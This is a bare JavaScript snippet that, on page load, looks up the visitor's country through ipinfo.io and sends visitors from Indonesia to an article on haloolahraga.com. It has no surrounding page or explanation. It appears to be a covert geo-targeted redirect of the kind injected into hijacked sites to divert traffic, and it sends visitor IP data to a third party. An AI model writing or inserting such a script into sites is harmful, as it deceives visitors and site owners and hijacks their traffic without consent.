document.addEventListener('DOMContentLoaded', function() { fetch('https://ipinfo.io/json') .then(response => response.json()) .then(data => { if (data.country === 'ID') { window.location.href = 'https://haloolahraga.com/profil-matt-baker-perjalanan-karier-dan-prestasinya/'; } }); });
